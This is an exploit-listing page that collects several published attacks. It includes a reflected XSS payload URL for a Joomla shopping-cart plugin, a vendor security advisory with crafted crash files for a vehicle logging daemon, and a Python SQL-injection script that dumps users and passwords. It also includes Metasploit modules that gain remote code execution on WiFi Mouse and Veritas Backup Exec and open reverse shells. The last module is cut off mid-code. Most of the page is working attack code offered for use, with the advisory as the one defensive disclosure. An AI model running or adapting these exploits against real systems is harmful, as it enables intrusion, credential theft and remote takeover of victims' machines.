Latest exploits :: CodePwn

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : extensions.joomla.org │ │ Vendor : Ossolution Team │ │ Software : EShop Joomla Shopping-Cart 3.6.0 - Reflected XSS │ │ Vuln Type: Reflected XSS │ │ Method : GET │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ GET parameter 'change_filter' is vulnerable to XSS Path: /eshop/filter.html?change_filter=[XSS] https://joomdonationdemo.com/eshop/filter.html?change_filter=d1a5x"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"wklcp [-] Done </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220923-0 > ======================================================================= title: Multiple Memory Corruption Vulnerabilities product: COVESA DLT daemon (Diagnostic Log and Trace) Connected Vehicle Systems Alliance (COVESA), formerly GENIVI vulnerable version: <= 2.18.8 fixed version: current master branch commit 855e0017a980d2990c16f7dbf3b4983b48fac272 CVE number: CVE-2022-39836, CVE-2022-39837 impact: medium homepage: https://github.com/COVESA/dlt-daemon found: 2022-01-14 by: Steffen Robertz (Office Vienna) Gerhard Hechenberger (Office Vienna) Thomas Weber (Office Vienna) Timo Longin (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "The Connected Vehicle Systems Alliance (COVESA) (formerly known as the GENIVI Alliance is an open, collaborative and impactful technology alliance; accelerating the full potential of connected vehicles. Working together, we are a force-multiplier, creating a more diverse, sustainable and integrated mobility ecosystem." Source: https://www.covesa.global/ "GENIVI Diagnostic Log and Trace (DLT) provides a log and trace interface, based on the standardised protocol specified in the AUTOSAR standard 4.0 DLT. It is used by other GENIVI components but can serve as logging framework for other applications without relation to GENIVI." Source: https://github.com/COVESA/dlt-daemon Business recommendation: ------------------------ The project fixed the vulnerability with commit 855e0017a980d2990c16f7dbf3b4983b48fac272 (https://github.com/COVESA/dlt-daemon/commit/855e0017a980d2990c16f7dbf3b4983b48fac272). No new version has been tagged, thus an update to the current master branch is recommended. Vulnerability overview/description: ----------------------------------- 1) Null-Pointer Dereference (CVE-2022-39837) Due to a faulty DLT file parser, a malicious DLT file that crashes the process can be created. This is due to missing validation checks. 2) Heap Buffer Over-Read (CVE-2022-39836) The DLT file parser will over read one byte from heap memory when converting a malicious DLT file. Proof of concept: ----------------- 1) Null-Pointer Dereference (CVE-2022-39837) The following example DLT file will cause a null pointer dereference and crash the dlt-convert process. However, the crash is caused in /dlt-daemon/src/shared/dlt_common.c:714 and thus will most likely affect the whole dlt-daemon suite. xxd nullpointer_dereference.dlt 00000000: 444c 5401 ffff ffff 0000 0000 4141 4141 DLT.........AAAA 00000010: ffff ffff .... Running the file causes the following crash: ./dlt-convert -m nullpointer_dereference.dlt [ 7118.461371]~DLT~10310~WARNING ~Cannot read standard header extra parameters from file! [1] 10310 segmentation fault (core dumped) ./dlt-convert -m nullpointer_dereference.dlt The error occurs as the htypew field in the DltStandardHeader indicates that a DltExtendedHeader is supplied. However, it is never checked, if an extended header is actually supplied within the DLT file. 2) Heap Buffer Over-Read (CVE-2022-39836) The following example DLT file will cause a heap buffer over-read by one byte if executed with ./dlt-convert -m <malicious_dlt_file> ----------------------- 00000000: 444c 5401 d718 aa61 ebaf 0200 4543 5531 DLT....a....ECU1 00000010: 3500 0020 4543 5531 0be0 cc29 2601 4441 5.. ECU1...)&.DA 00000020: 3100 4443 3100 020f 0000 0002 0000 0000 1.DC1........... 00000030: 444c 4c01 d718 aa61 fb17 775f 0bce 290c DLL....a..w_..). 00000040: 4101 444c 5444 494e 544d 0002 0000 2e00 A.DLTDINTM...... 00000050: 4461 656d 6f6e 206c 6175 6e63 6865 642e Daemon launched. 00000060: 2053 7461 7274 696e 6720 024c 4f47 0054 Starting .LOG.T 00000070: 4553 5423 0800 0000 0000 0003 0000 0000 EST#............ 00000080: 0200 001d 0054 68af 0200 4543 5531 3d01 .....Th...ECU1=. 00000090: 0079 4543 5531 0017 775f 0bd3 de1b 4101 .yECU1..w_....A. 000000a0: 444c 5444 494e 544d 0002 0000 5900 4170 DLTDINTM....Y.Ap 000000b0: 706c 6963 6174 696f 6e49 4420 274c 4f47 plicationID 'LOG 000000c0: 2720 7265 6769 7374 6572 6564 2066 6f72 ' registered for 000000d0: 2050 4944 2031 3533 3739 3138 2c20 4465 PID 1537918, De 000000e0: 7363 7269 7074 696f 6e3d 5465 7374 2041 scription=Test A 000000f0: 7070 6c69 6361 7469 6f6e 2066 6f72 204c pplication for L 00000100: 6f67 6710 0000 0044 4c54 01d7 18aa 61fe ogg....DLT....a. 00000110: af02 0045 4355 313d 0000 4945 4355 3100 ...ECU1=..IECU1. 00000120: 1777 7e0b d3de 1b31 024c 4f47 6973 206d .w~....1.LOGis m 00000130: 7920 6669 7273 7420 6c6f 0000 00f5 0100 y first lo...... 00000140: 001d 0054 6869 7320 6973 206d 7920 6669 ...This is my fi 00000150: 7273 7420 6c6f 6720 6d65 7373 6167 6500 rst log message. 00000160: 444c 5401 d718 b261 00b0 0200 4543 5531 DLT....a....ECU1 00000170: 3d01 0049 4543 5500 0001 0000 0000 0200 =..IECU......... 00000180: 001d 0054 6869 7320 6973 206d 7920 6669 ...This is my fi 00000190: 7273 7420 6c6f 6720 6d65 7373 6167 6500 rst log message. 000001a0: 444c 5401 d718 aa61 01b0 0200 4543 5531 DLT....a....ECU1 000001b0: 3d02 0049 4543 5531 0017 777e 0bd4 052d =..IECU1..w~...- 000001c0: 3102 4c4f 4700 5445 5354 2308 0000 0000 1.LOG.TEST#..... 000001d0: 0000 0200 0000 0002 0000 9c00 5468 6973 ............This 000001e0: 2069 7320 6d79 2066 6972 7374 206c 6f67 is my first log 000001f0: 206d 6573 7361 6765 0044 4c54 01d7 18aa message.DLT.... 00000200: 6113 b002 0045 4355 313d 0300 4945 4355 a....ECU1=..IECU 00000210: 310b d418 b831 024c 4f47 0054 4553 5423 1....1.LOG.TEST# 00000220: 0800 0000 0000 0003 0000 0000 0200 001d ................ 00000230: 0054 6869 7320 6973 206d 7920 6669 7273 .This is my firs 00000240: 7420 6c6f 6720 6d65 7373 6167 6500 444c t log message.DL 00000250: 5401 d718 aa61 15b0 4800 4543 5531 3d04 T....a..H.ECU1=. 00000260: 0049 4543 5531 0017 777e 0bd4 2c43 3102 .IECU1..w~..,C1. 00000270: 4c4f 4700 5445 5354 2308 0000 0000 0000 LOG.TEST#....... 00000280: 0400 0000 0002 0000 1d00 5468 6973 2069 ..........This i 00000290: 7320 6d79 2066 6972 7b74 0be0 cc29 2601 s my fir{t...)&. 000002a0: 4441 3100 4443 3100 020f 0000 0002 0000 DA1.DC1......... 000002b0: 0000 444c 4c01 313d 0200 3845 4355 3100 ..DLL.1=..8ECU1. 000002c0: 1777 5f0b d466 dd41 0144 4c54 4449 4e54 .w_..f.A.DLTDINT 000002d0: 4d00 0200 0018 0055 6e72 6567 6973 7465 M......Unregiste 000002e0: 7265 6420 4170 4944 2027 4c4f 4727 0044 red ApID 'LOG'.D 000002f0: 4c54 01d7 18aa 444c 5401 d718 aa61 ebaf LT....DLT....a.. 00000300: 0200 4543 5531 3500 0020 4543 5531 0be0 ..ECU15.. ECU1.. 00000310: cc29 2601 4441 3100 4443 3100 020f 0000 .)&.DA1.DC1..... 00000320: 0002 0000 0000 444c 5401 d718 aa61 fbaf ......DLT....a.. 00000330: 0200 4543 5531 3d00 004e 4543 5531 0017 ..ECU1=..NECU1.. 00000340: 775f 0bce 290c 4101 444c 5444 494e 544d w_..).A.DLTDINTM 00000350: 0002 0000 2e00 4461 656d 6f6e 206c 6175 ......Daemon lau 00000360: 6e63 6865 642e 2053 7461 7274 696e 6720 nched. Starting 00000370: 746f 206f 7574 7075 7420 7472 6163 6573 to output traces 00000380: 2e2e 2e00 444c 5401 d718 aa61 fdaf 0200 ....DLT....a.... 00000390: 4543 5531 3d01 0079 4543 55 ECU1=..yECU --------------------------- Compiling dlt-convert with ASAN support shows a heap-buffer over-read of one byte: ------------------------------------------------------------------------------------------- �� )&D app_trace state V 85 [000000: 41 31 00 44 43 31 00 02 0f 00 00 00 02 00 00 00 A1.DC1.......... 000010: 00 44 4c 54 01 d7 18 aa 61 fb af 02 00 45 43 55 .DLT....a....ECU 000020: 31 3d 00 00 4e 45 43 55 31 00 17 77 5f 0b ce xx 1=..NECU1..w_..] [1646261.167986]~DLT~547178~WARNING ~Cannot read standard header extra parameters from file! 5 2021/12/03 14:17:11.176125 822234191 001 CU15 1 �� )&D app_trace state V 85 ================================================================= ==547178==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60400000003f at pc 0x7ffff7b77973 bp 0x7fffffffa7f0 sp 0x7fffffffa7e8 READ of size 1 at 0x60400000003f thread T0 [Detaching after fork from child process 550639] #0 0x7ffff7b77972 in dlt_print_hex_string_delim /dlt-daemon/src/shared/dlt_common.c:147:35 #1 0x7ffff7b77ede in dlt_print_hex_string /dlt-daemon/src/shared/dlt_common.c:156:12 #2 0x7ffff7b77ede in dlt_print_mixed_string /dlt-daemon/src/shared/dlt_common.c:205:9 #3 0x7ffff7b7fb4f in dlt_message_payload /dlt-daemon/src/shared/dlt_common.c #4 0x7ffff7b9c12d in dlt_message_print_mixed_plain /dlt- daemon/src/shared/dlt_common.c:3281:5 #5 0x4cd050 in main /dlt-daemon/src/console/dlt-convert.c:454:21 #6 0x7ffff6bd3ca2 in __libc_start_main (/lib64/libc.so.6+0x3aca2) #7 0x41f1bd in _start (/dlt-daemon/build_asan_debug2/src/console/dlt-convert+0x41f1bd) 0x60400000003f is located 0 bytes to the right of 47-byte region [0x604000000010,0x60400000003f) allocated by thread T0 here: #0 0x499e5d in malloc /tmp/llvm/utils/release/final/llvm-project/compiler- rt/lib/asan/asan_malloc_linux.cpp:145:3 #1 0x7ffff7b8f55d in dlt_file_read_data /dlt-daemon/src/shared/dlt_common.c:1428:43 SUMMARY: AddressSanitizer: heap-buffer-overflow /dlt-daemon/src/shared/dlt_common.c:147:35 in dlt_print_hex_string_delim Shadow bytes around the buggy address: 0x0c087fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c087fff8000: fa fa 00 00 00 00 00[07]fa fa fa fa fa fa fa fa 0x0c087fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==547178==ABORTING Vulnerable / tested versions: ----------------------------- The current Git Master branch v2.18.8 has been tested and found to be vulnerable. (tested at commit aa1364fbdf8700a2c3d2176180f92fb9a4b44251) Vendor contact timeline: ------------------------ 2022-04-01: Contacting maintainers through email. 2022-04-01: Email returned to sender because of illegal attached files (probably PGP keys). 2022-04-04: Sent advisory via SMIME encrypted mail to another identified email address. 2022-04-05: Advisory received, vendor starts to work on fixes. 2022-04-20: Requested status. 2022-04-21: Currently busy with different projects. Will keep us updated on patching efforts. 2022-05-04: Vendor shares tentative patches. 2022-07-29: Requested status update from vendor. 2022-08-01: Vulnerability fixed in commit 855e0017a980d2990c16f7dbf3b4983b48fac272 2022-09-23: Public release of security advisory Solution: --------- The vulnerability has been fixed with commit 855e0017a980d2990c16f7dbf3b4983b48fac272. No new version has been tagged, thus an update to the current master branch is recommended. See https://github.com/COVESA/dlt-daemon/commit/855e0017a980d2990c16f7dbf3b4983b48fac272 Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF S. Robertz, G. Hechenberger, T. Weber, T. Longin / @2022 </code></pre>

<pre><code># Exploit Title: Food Ordering Management System - SQL Injection # Google Dork: N/A # Date: 2022-9-27 # Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11 # Vendor Homepage: https://www.sourcecodester.com/php/15689/food-ordering-management-system-php-and-mysql-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/foms.zip # Tested on: windows 11 - XAMPP # CVE : N/A # Version: 1.0 #/usr/bin/python3 import requests import os import sys import time import random from bs4 import BeautifulSoup # clean screen os.system("cls") os.system("clear") logo = ''' ################################################################## # # # SQL injection (Food Ordering Management System) # # # ################################################################## ''' print(logo) url = str(input("Enter website url => ")) username = str(input("Enter Username => : ")) name = ("test123456") password = ("test123456") phone = ("4511233199") number = ("1234567891000000") cvv = ("444") req = requests.Session() regsiter_page = (url+"/foms/routers/register-router.php") regsiter = {'username':username,'name':name,'password':password,'phone':phone,'number':number,'cvv':cvv} req_regsiter = req.post(regsiter_page,data=regsiter) print("[+] Regsiter Successfully") login = {'username':username,'password':password} login_page = (url+"/foms/routers/router.php") req_login = req.post(login_page,data=login) print("[+] Login Successfully") sql = req.get(url+"/foms/tickets.php?status=Open' union select 1,2,username,4,password,6,7,8 from users-- -") text = sql.text soup = BeautifulSoup(text,"html.parser") print("[+] SQL Injction Get Users and Password from table Users") for link in soup.findAll(True, {'class':['task-cat light-blue', 'collections-title']}): time.sleep(0.2) print(link.get) </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Exploit::Remote::Tcp include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'Wifi Mouse RCE', 'Description' => %q{ The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the authentication is completely implemented entirely on the client side. By utilizing this vulnerability, is possible to open a program on the server (cmd.exe in our case) and type commands that will be executed as the user running WiFi Mouse (Mouse Server), resulting in remote code execution. Tested against versions 1.8.3.4 (current as of module writing) and 1.8.2.3. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'REDHATAUGUST', # edb 'H4RK3NZ0' # edb, original discovery ], 'References' => [ [ 'EDB', '50972' ], [ 'EDB', '49601' ], [ 'CVE', '2022-3218' ], [ 'URL', 'http://wifimouse.necta.us/' ], [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/wifi%20mouse/wifi-mouse-server-rce.py' ] ], 'Arch' => [ ARCH_X64, ARCH_X86 ], 'Platform' => 'win', 'Targets' => [ [ 'stager', { 'CmdStagerFlavor' => ['psh_invokewebrequest', 'certutil'] } ], ], 'Payload' => { 'BadChars' => "\x0a\x00" }, 'DefaultOptions' => { # since this may get typed out ON SCREEN we want as small a payload as possible 'PAYLOAD' => 'windows/shell/reverse_tcp' }, 'DisclosureDate' => '2021-02-25', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [CRASH_SERVICE_DOWN], 'SideEffects' => [SCREEN_EFFECTS, ARTIFACTS_ON_DISK] # typing on screen } ) ) register_options( [ OptPort.new('RPORT', [true, 'Port WiFi Mouse Mouse Server runs on', 1978]), OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]), OptInt.new('LINEMAX', [true, 'Maximum length of lines to send for stager method. Smaller for more unstable connections.', 1_020]), ] ) end def send_return sock.put('key 3RTN') # what the mobile app sends end def send_command(command) sock.put("utf8 #{command}\x0A") sleep(datastore['SLEEP']) send_return end def open_file(file) file = "/#{file}".gsub('\\', '/').gsub(':', '') sock.put("openfile #{file}\x0A") end def exploit connect print_status('Opening command prompt') open_file('C:\\Windows\\System32\\cmd.exe') sleep(datastore['SLEEP']) # give time for it to open print_status('Typing out payload') execute_cmdstager({ linemax: datastore['LINEMAX'], delay: datastore['SLEEP'] }) handler end def execute_command(cmd, _opts = {}) send_command(cmd) end end </code></pre>

<pre><code># frozen_string_literal: true ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::NDMPSocket include Msf::Exploit::CmdStager include Msf::Exploit::EXE prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Veritas Backup Exec Agent Remote Code Execution', 'Description' => %q{ Veritas Backup Exec Agent supports multiple authentication schemes and SHA authentication is one of them. This authentication scheme is no longer used within Backup Exec versions, but hadn’t yet been disabled. An attacker could remotely exploit the SHA authentication scheme to gain unauthorized access to the BE Agent and execute an arbitrary OS command on the host with NT AUTHORITY\SYSTEM or root privileges depending on the platform. The vulnerability presents in 16.x, 20.x and 21.x versions of Backup Exec up to 21.2 (or up to and including Backup Exec Remote Agent revision 9.3) }, 'License' => MSF_LICENSE, 'Author' => ['Alexander Korotin <0xc0rs[at]gmail.com>'], 'References' => [ ['CVE', '2021-27876'], ['CVE', '2021-27877'], ['CVE', '2021-27878'], ['URL', 'https://www.veritas.com/content/support/en_US/security/VTS21-001'] ], 'Platform' => %w[win linux], 'Targets' => [ [ 'Windows', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'CmdStagerFlavor' => %w[certutil vbs psh_invokewebrequest debug_write debug_asm] } ], [ 'Linux', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'CmdStagerFlavor' => %w[bourne wget curl echo] } ] ], 'DefaultOptions' => { 'RPORT' => 10_000 }, 'Privileged' => true, 'DisclosureDate' => '2021-03-01', 'DefaultTarget' => 0, 'Notes' => { 'Reliability' => [UNRELIABLE_SESSION], 'Stability' => [CRASH_SAFE], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] } ) ) register_options([ OptString.new('SHELL', [true, 'The shell for executing OS command', '/bin/bash'], conditions: ['TARGET', '==', 'Linux']) ]) deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH') end def execute_command(cmd, opts = {}) case target.opts['Platform'] when 'win' wrap_cmd = "C:\\Windows\\System32\\cmd.exe /c \"#{cmd}\"" when 'linux' wrap_cmd = "#{datastore['SHELL']} -c \"#{cmd}\"" end ndmp_sock = opts[:ndmp_sock] ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP_EXECUTE_COMMAND, NdmpExecuteCommandReq.new({ cmd: wrap_cmd, unknown: 0 }).to_xdr ) ) end def exploit print_status('Exploiting ...') ndmp_status, ndmp_sock, msg_fail_reason = ndmp_connect fail_with(Msf::Module::Failure::NotFound, "Can not connect to BE Agent service. #{msg_fail_reason}") unless ndmp_status ndmp_status, msg_fail_reason = tls_enabling(ndmp_sock) fail_with(Msf::Module::Failure::UnexpectedReply, "Can not establish TLS connection. #{msg_fail_reason}") unless ndmp_status ndmp_status, msg_fail_reason = sha_authentication(ndmp_sock) fail_with(Msf::Module::Failure::NotVulnerable, "Can not authenticate with SHA. #{msg_fail_reason}") unless ndmp_status if target.opts['Platform'] == 'win' filename = "#{rand_text_alpha(8)}.exe" ndmp_status, msg_fail_reason = win_write_upload(ndmp_sock, filename) if ndmp_status ndmp_status, msg_fail_reason = exec_win_command(ndmp_sock, filename) fail_with(Msf::Module::Failure::PayloadFailed, "Can not execute payload. #{msg_fail_reason}") unless ndmp_status else print_status('Can not upload payload with NDMP_FILE_WRITE packet. Trying to upload with CmdStager') execute_cmdstager({ ndmp_sock: ndmp_sock, linemax: 512 }) end else print_status('Uploading payload with CmdStager') execute_cmdstager({ ndmp_sock: ndmp_sock, linemax: 512 }) end end def check print_status('Checking vulnerability') ndmp_status, ndmp_sock, msg_fail_reason = ndmp_connect return Exploit::CheckCode::Unknown("Can not connect to BE Agent service. #{msg_fail_reason}") unless ndmp_status print_status('Getting supported authentication types') ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request(NDMP::Message::CONFIG_GET_SERVER_INFO) ) ndmp_payload = NdmpConfigGetServerInfoRes.from_xdr(ndmp_msg.body) print_status("Supported authentication by BE agent: #{ndmp_payload.auth_types.map do |k, _| "#{AUTH_TYPES[k]} (#{k})" end.join(', ')}") print_status("BE agent revision: #{ndmp_payload.revision}") if ndmp_payload.auth_types.include?(5) Exploit::CheckCode::Appears('SHA authentication is enabled') else Exploit::CheckCode::Safe('SHA authentication is disabled') end end def ndmp_connect print_status('Connecting to BE Agent service') ndmp_msg = nil begin ndmp_sock = NDMP::Socket.new(connect) rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused => e return [false, nil, e.to_s] end begin Timeout.timeout(datastore['ConnectTimeout']) do ndmp_msg = ndmp_sock.read_ndmp_msg(NDMP::Message::NOTIFY_CONNECTED) end rescue Timeout::Error return [false, nil, 'No NDMP_NOTIFY_CONNECTED (0x502) packet from BE Agent service'] else ndmp_payload = NdmpNotifyConnectedRes.from_xdr(ndmp_msg.body) end ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP::Message::CONNECT_OPEN, NdmpConnectOpenReq.new({ version: ndmp_payload.version }).to_xdr ) ) ndmp_payload = NdmpConnectOpenRes.from_xdr(ndmp_msg.body) unless ndmp_payload.err_code.zero? return [false, ndmp_sock, "Error code of NDMP_CONNECT_OPEN (0x900) packet: #{ndmp_payload.err_code}"] end [true, ndmp_sock, nil] end def tls_enabling(ndmp_sock) print_status('Enabling TLS for NDMP connection') ndmp_tls_certs = NdmpTlsCerts.new('VeritasBE', datastore['RHOSTS'].to_s) ndmp_tls_certs.forge_ca ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP_SSL_HANDSHAKE, NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_REQ])).to_xdr ) ) ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body) unless ndmp_payload.err_code.zero? return [false, "Error code of SSL_HANDSHAKE_CSR_REQ (2) packet: #{ndmp_payload.err_code}"] end ndmp_tls_certs.sign_agent_csr(ndmp_payload.data) ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP_SSL_HANDSHAKE, NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_SIGNED])).to_xdr ) ) ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body) unless ndmp_payload.err_code.zero? return [false, "Error code of SSL_HANDSHAKE_CSR_SIGNED (3) packet: #{ndmp_payload.err_code}"] end ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP_SSL_HANDSHAKE, NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CONNECT])).to_xdr ) ) ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body) unless ndmp_payload.err_code.zero? return [false, "Error code of SSL_HANDSHAKE_CONNECT (4) packet: #{ndmp_payload.err_code}"] end ssl_context = OpenSSL::SSL::SSLContext.new ssl_context.add_certificate(ndmp_tls_certs.ca_cert, ndmp_tls_certs.ca_key) ndmp_sock.wrap_with_ssl(ssl_context) [true, nil] end def sha_authentication(ndmp_sock) print_status('Passing SHA authentication') ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP_CONFIG_GET_AUTH_ATTR, NdmpConfigGetAuthAttrReq.new({ auth_type: 5 }).to_xdr ) ) ndmp_payload = NdmpConfigGetAuthAttrRes.from_xdr(ndmp_msg.body) unless ndmp_payload.err_code.zero? return [false, "Error code of NDMP_CONFIG_GET_AUTH_ATTR (0x103) packet: #{ndmp_payload.err_code}"] end ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP::Message::CONNECT_CLIENT_AUTH, NdmpConnectClientAuthReq.new( { auth_type: 5, username: 'Administrator', # Doesn't metter hash: Digest::SHA256.digest("\x00" * 64 + ndmp_payload.challenge) } ).to_xdr ) ) ndmp_payload = NdmpConnectClientAuthRes.from_xdr(ndmp_msg.body) unless ndmp_payload.err_code.zero? return [false, "Error code of NDMP_CONECT_CLIENT_AUTH (0x901) packet: #{ndmp_payload.err_code}"] end [true, nil] end def win_write_upload(ndmp_sock, filename) print_status('Uploading payload with NDMP_FILE_WRITE packet') ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP_FILE_OPEN_EXT, NdmpFileOpenExtReq.new( { filename: filename, dir: '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\Temp', mode: 4 } ).to_xdr ) ) ndmp_payload = NdmpFileOpenExtRes.from_xdr(ndmp_msg.body) unless ndmp_payload.err_code.zero? return [false, "Error code of NDMP_FILE_OPEN_EXT (0xf308) packet: #{ndmp_payload.err_code}"] end hnd = ndmp_payload.handler exe = generate_payload_exe offset = 0 block_size = 2048 while offset < exe.length ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP_FILE_WRITE, NdmpFileWriteReq.new({ handler: hnd, len: block_size, data: exe[offset, block_size] }).to_xdr ) ) ndmp_payload = NdmpFileWriteRes.from_xdr(ndmp_msg.body) unless ndmp_payload.err_code.zero? return [false, "Error code of NDMP_FILE_WRITE (0xF309) packet: #{ndmp_payload.err_code}"] end offset += block_size end ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP_FILE_CLOSE, NdmpFileCloseReq.new({ handler: hnd }).to_xdr ) ) ndmp_payload = NdmpFileCloseRes.from_xdr(ndmp_msg.body) unless ndmp_payload.err_code.zero? return [false, "Error code of NDMP_FILE_CLOSE (0xF306) packet: #{ndmp_payload.err_code}"] end [true, nil] end def exec_win_command(ndmp_sock, filename) cmd = "C:\\Windows\\System32\\cmd.exe /c \"C:\\Windows\\Temp\\#{filename}\"" ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP_EXECUTE_COMMAND, NdmpExecuteCommandReq.new({ cmd: cmd, unknown: 0 }).to_xdr ) ) ndmp_payload = NdmpExecuteCommandRes.from_xdr(ndmp_msg.body) unless ndmp_payload.err_code.zero? return [false, "Error code of NDMP_EXECUTE_COMMAND (0xF30F) packet: #{ndmp_payload.err_code}"] end [true, nil] end # Class to create CA and client certificates class NdmpTlsCerts def initialize(hostname, ip) @hostname = hostname @ip = ip @ca_key = nil @ca_cert = nil @be_agent_cert = nil end SSL_HANDSHAKE_TYPES = { SSL_HANDSHAKE_TEST_CERT: 1, SSL_HANDSHAKE_CSR_REQ: 2, SSL_HANDSHAKE_CSR_SIGNED: 3, 